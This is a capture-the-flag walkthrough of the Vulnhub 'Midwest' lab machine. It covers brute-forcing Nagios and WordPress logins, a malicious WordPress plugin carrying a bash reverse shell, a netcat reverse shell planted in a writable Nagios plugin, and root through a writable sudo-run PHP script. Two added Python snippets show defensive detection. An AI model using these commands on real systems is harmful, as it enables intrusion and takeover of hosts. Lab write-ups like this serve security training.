Vulnhub: Midwest Walkthrough

Tushar Singh

Hint: it must be said that the machine's author mentions that it takes a bit of brute force, but that description is quite far from reality.

POC

Step 1: Start simply with a port scan:

figure 1.1

As shown in figure 1.1, there are two open ports that we have to enumerate.

Let's start with HTTP on port 80.

Step 2: Hit the machine IP in your browser. The website does not load properly and redirects to www.midwest.htb.

Step 3: Add the hostname to the hosts file: open /etc/hosts and add an entry for the hostname, as shown in figure 1.2.

figure 1.2

Then open the hostname or IP in the browser; the website now loads properly.

figure 1.3

After crawling the website we find that it is built on WordPress.

You can also use the Wappalyzer extension to find out what a website is built with.

Step 4: Let's start with directory brute-forcing.

I am using gobuster here. You can also use other directory brute-forcing tools; there are many, such as ffuf, dirsearch, dirb and feroxbuster.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://www.midwest.htb

Visiting each directory, /nagios asks for credentials. A quick search tells us that Nagios is a free and open-source application that monitors systems, networks and infrastructure, offering monitoring and alerting for servers, switches, applications and services.

We try the Nagios default credentials, but nothing happens:

nagiosadmin:PASSW0RD

nagiosadmin:admin

I'm trying the users nagios, nagiosadmin, admin and root, which seem pretty official. I stop after a while because I believe that on a CTF we should not spend more than 10–20 minutes brute-forcing a user.

Step 5: So I decide to switch to CeWL, a tool that generates a word-list from the words present on the website. The command is also simple:

cewl http://www.midwest.htb/ > pass.txt

The above command builds a word-list from the words present on the website.

We get a list of fairly basic and largely useless words (I won't dwell on my opinion of this tool), so let's turn this word-list into a better one with John the Ripper.

Step 6: From this list we can use John the Ripper to generate permutations:

john --rules --wordlist=pass.txt --stdout | sort | uniq > wordlist.txt

Step 7: Then brute-force with hydra:

hydra -l nagiosadmin -P wordlist.txt www.midwest.htb http-get /nagios

We get the credentials:

nagiosadmin:PowerPower
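From the defender's side, the hydra run above leaves an obvious trace: a burst of HTTP 401 responses for /nagios from one source address in a short window, typically followed by a 200 once the right password lands. The following is an added example, not part of the original post, that parses constructed Apache combined-format access-log lines and flags sources that exceed a threshold of 401s on a Basic-auth path within a sliding time window.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log format: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

def parse_line(line):
    """Return (ip, timestamp, path, status) or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"], int(m["status"])

def find_bruteforce(lines, path_prefix="/nagios", threshold=20, window_s=60):
    """Map ip -> max number of 401s on path_prefix seen inside any window_s-second window, for ips at or above threshold."""
    failures = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, path, status = rec
        if status == 401 and path.startswith(path_prefix):
            failures[ip].append(ts)
    hits = {}
    for ip, times in failures.items():
        times.sort()
        lo = best = 0
        for hi in range(len(times)):  # sliding window over sorted timestamps
            while (times[hi] - times[lo]).total_seconds() > window_s:
                lo += 1
            best = max(best, hi - lo + 1)
        if best >= threshold:
            hits[ip] = best
    return hits

# Constructed sample: 25 failures from 10.0.0.5 in 25 seconds, then a success; one stray 401 from 10.0.0.9.
def sample_log():
    lines = []
    for i in range(25):
        lines.append(f'10.0.0.5 - - [01/Jan/2024:12:00:{i:02d} +0000] "GET /nagios/ HTTP/1.1" 401 381 "-" "Mozilla/4.0 (Hydra)"')
    lines.append('10.0.0.9 - - [01/Jan/2024:12:00:10 +0000] "GET /nagios/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"')
    lines.append('10.0.0.5 - - [01/Jan/2024:12:00:30 +0000] "GET /nagios/ HTTP/1.1" 200 1024 "-" "Mozilla/4.0 (Hydra)"')
    return lines
```

Tune threshold and window_s to the normal login failure rate of the host; a single 401 from a mistyped password should never trip it.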

After logging into Nagios there seems to be nothing here.

The author hints at brute force.

Step 8: So brute-force WordPress now with the word-list we made:

wpscan --disable-tls-checks --url http://www.midwest.htb/  -U admin -P /home/enyo/wordlist.txt

We get the admin password:

admin:Power9

Step 9: Let's log in to WordPress. There are many ways to get a reverse shell from WordPress: https://www.hackingarticles.in/wordpress-reverse-shell/

Step 10: I use the malicious plugin method.

Create a plugin file:

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.7/443 0>&1'");
?>

Convert it into a zip:

zip revshell.zip revshell.php

Then go to the plugin section, upload this malicious plugin and start a listener:

nc -nlvp 443

To get the reverse shell, activate the plugin and check your listener.

We get the shell. For a proper interactive shell, upgrade it as described here: https://www.armourinfosec.com/spawning-interactive-reverse-shell/

Let's step forward and escalate privileges.

Privilege Escalation

After crawling the landing directory and the home directory, run the automated script LinPEAS to gather details and find misconfigurations on the machine.

LinPEAS shows that there are many directories under /usr/local with write permission, so let's find the writable files with find:

find / -type f -writable 2> /dev/null | grep -v /var/www | grep -v /proc

Basically it corresponds to files in the following folders:

/usr/local/nagios/
/usr/local/nagiosxi/
/var/lib/snmp/mibs/
/usr/local/nagvis/

Nagios is monitoring software, so first let's check its configuration files.

The first folder contains /usr/local/nagios/etc/ndo.cfg, which holds the database credentials:

db_user=ndoutils
db_pass=n@gweb
db_name=nagios
db_host=localhost
db_port=3306

db_max_reconnect_attempts=5

Similarly, another config file, /usr/local/nagiosxi/html/config.inc.php, also contains DB credentials:


$cfg['db_info'] = array(
    "nagiosxi" => array(
        "dbtype" => 'mysql',
        "dbserver" => '',
        "user" => 'nagiosxi',
        "pwd" => 'n@gweb',
        "db" => 'nagiosxi',
        "charset" => "utf8",
        "dbmaint" => array(
            "max_auditlog_age" => 180,
            "max_commands_age" => 480,
            "max_events_age" => 480,
            "optimize_interval" => 60,
            "repair_interval" => 0,
        ),
    ),

    "nagiosql" => array(
        "dbtype" => 'mysql',
        "dbserver" => 'localhost',
        "user" => 'nagiosql',
        "pwd" => 'n@gweb',
        "db" => 'nagiosql',
        "charset" => "utf8",
        "dbmaint" => array(
            "max_logbook_age" => 480,
            "optimize_interval" => 60,
            "repair_interval" => 0,
        ),
    ),
);

After logging into the database and spending some time in it, we find that the tbl_command and tbl_service tables contain something interesting.

The check_ping and Memory Usage services have something for sure.

The Nagios configuration here must be file-based, and indeed I find the ping command defined in /usr/local/nagios/etc/commands.cfg:

define command {
command_name check_ping
command_line $USER1$/check_ping -H $HOSTADDRESS$ -w $ARG1$ -c $ARG2$ -p 5
}

The program referenced is /usr/local/nagios/libexec/check_ping, an ELF binary.

I tried to modify the cfg file, but it seems that the modification is not reloaded, and I do not have sufficient rights to send a signal to the Nagios process.

Let's check the other service, Memory Usage, in /usr/local/nagios/etc/services/localhost.cfg:

define service {
host_name localhost
service_description Memory Usage
use local-service
check_command check_local_mem!30!20
register 1
}

The Memory Usage service calls the command check_local_mem, which corresponds to the following entry in /usr/local/nagios/etc/commands.cfg:

define command {
command_name check_local_mem
command_line $USER1$/custom_check_mem -w $ARG1$ -c $ARG2$ -n
}

We see that check_local_mem calls custom_check_mem, so let's find that file. We find it at:

/usr/local/nagios/libexec/custom_check_mem

We have write permission on this file, so let's replace it with our payload:

echo "nohup nc -e /bin/sh 192.168.1.7 4444&" > custom_check_mem

Start our listener on the port the payload connects back to:

nc -nlvp 4444

We get a shell as the nagios user.

Read the user flag:
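The root cause here is a Nagios check plugin that the monitoring user can overwrite while Nagios runs it on a schedule. A defender can catch that before it is abused by walking commands.cfg, expanding the $USER1$ macro the way Nagios does (from resource.cfg) and checking the permissions on each plugin binary. The following is an added example, not code from the original post; it uses a constructed commands.cfg excerpt matching the two commands above and builds a throwaway libexec directory to audit, with custom_check_mem deliberately world-writable. The same writability check applies to the send_to_nls.php script that sudo later runs as root.

```python
import os
import re
import stat
import tempfile

# Constructed excerpt in the format of /usr/local/nagios/etc/commands.cfg, covering the
# two commands discussed above. $USER1$ is the libexec path Nagios reads from resource.cfg.
COMMANDS_CFG = """
define command {
    command_name check_ping
    command_line $USER1$/check_ping -H $HOSTADDRESS$ -w $ARG1$ -c $ARG2$ -p 5
}
define command {
    command_name check_local_mem
    command_line $USER1$/custom_check_mem -w $ARG1$ -c $ARG2$ -n
}
"""

def parse_commands(cfg_text, macros):
    """Map command_name -> plugin executable, with $USERn$ macros expanded."""
    commands = {}
    for body in re.findall(r"define\s+command\s*\{(.*?)\}", cfg_text, re.S):
        fields = dict(re.findall(r"^\s*(\w+)\s+(.+?)\s*$", body, re.M))
        exe = fields["command_line"].split()[0]  # first token is the plugin path
        for macro, value in macros.items():
            exe = exe.replace(macro, value)
        commands[fields["command_name"]] = exe
    return commands

def unprivileged_writable(path):
    """True if the plugin can be modified by its group or by anyone (the custom_check_mem case)."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_plugins(cfg_text, macros):
    """Return sorted command names whose plugin file is group- or world-writable."""
    return sorted(name for name, exe in parse_commands(cfg_text, macros).items()
                  if os.path.exists(exe) and unprivileged_writable(exe))

def demo():
    """Build a throwaway libexec dir: check_ping locked down (0755), custom_check_mem world-writable (0777)."""
    libexec = tempfile.mkdtemp()
    for name, mode in (("check_ping", 0o755), ("custom_check_mem", 0o777)):
        path = os.path.join(libexec, name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\necho OK\n")
        os.chmod(path, mode)
    return audit_plugins(COMMANDS_CFG, {"$USER1$": libexec})
```

On a real host, point macros at the values in resource.cfg and also compare the file owner against the user Nagios runs as; the fix is root ownership with mode 0755 on everything under libexec.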

cat /home/nagios/user.txt
7ec306b6fa01510ffc4e0d0fac97c23e

Let’s get privileges of ROOT!

Let's try sudo -l.

We find this entry with sudo permission: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *

The file "send_to_nls.php" is also writable, so let's change it and get root.

Let's change the file:

printf "<?php \n system('/bin/bash') \n?>" > /usr/local/nagiosxi/scripts/send_to_nls.php

and run:

sudo /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *

and finally we get root!

Let's read the flag:

cat root.txt 
0d599f0ec05c3bda8c3b8a68c32a1b47

n0w ch!ll

Thank You Guys! That’s all from my side.

Hope you found this walkthrough somewhat helpful.

Happy Hacking!

Thanks to the author of the machine: https://twitter.com/renmizo

You can contact me on Twitter: